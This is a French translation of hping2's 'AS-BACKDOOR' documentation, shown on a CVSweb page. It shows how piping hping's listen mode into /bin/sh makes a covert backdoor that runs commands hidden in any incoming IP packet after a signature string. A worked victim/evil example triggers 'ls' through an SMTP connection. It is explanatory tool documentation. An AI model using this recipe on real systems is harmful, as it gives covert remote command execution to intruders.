File:  [ELWIX - Embedded LightWeight unIX -] / embedaddon / hping2 / docs / french / AS-BACKDOOR
Revision 1.1.1.1 (vendor branch): download - view: text, annotated - select for diffs - revision graph
Tue Feb 21 22:11:37 2012 UTC (12 years, 4 months ago) by misho
Branches: hping2, MAIN
CVS tags: v2_0_0rc3p7, v2_0_0rc3p5, v2_0_0rc3p4, v2_0_0rc3p0, v2_0_0rc3, HEAD
hping2

hping peut être utilisé comme une backdoor (ndt : porte dérobée). Essayez
juste l'option -9 (--listen) et redirigez via un tube dans /bin/sh :

Mettez hping en mode listen (ndt : d'écoute) sur le système victime.

victim# hping -I eth0 -9 mysign | /bin/sh

Chaque paquet qui contient "mysign" sera traité par hping, tous les octets
qui suivent "mysign" dans les paquets seront envoyés dans la sortie
standard, ainsi par exemple je serai capable d'exécuter des commandes en
utilisant tous types de protocoles. Juste pour exemple je peux utiliser le
démon smtpd pour exécuter 'ls' sur la victime.

evil$ telnet victim 25

Trying 192.168.1.1...
Connected to nano (192.168.1.1).
Escape character is '^]'.
220 nano.marmoc.net ESMTP Sendmail
mysignls;

sur la victime vous verrez :

victim# hping -I eth0 -9 mysign | /bin/sh
hping2 listen mode
bin   cdrom  etc     home  local-home  mnt   root  tmp  var
boot  dev    export  lib   lost+found  proc  sbin  usr
: command not found

Comme vous pouvez le voir j'utilise 'ls;' puisque sinon le shell recevra
juste ls^M. Le ";" force l'exécution de la commande (du moins avec bash et
zsh, vérifiez votre shell pour plus d'informations).

Ceci fonctionne avec tous les types de paquets IP valides non filtrés, le
niveau supérieur de protocole importe peu.

antirez <antirez@invece.org>

FreeBSD-CVSweb <freebsd-cvsweb@FreeBSD.org>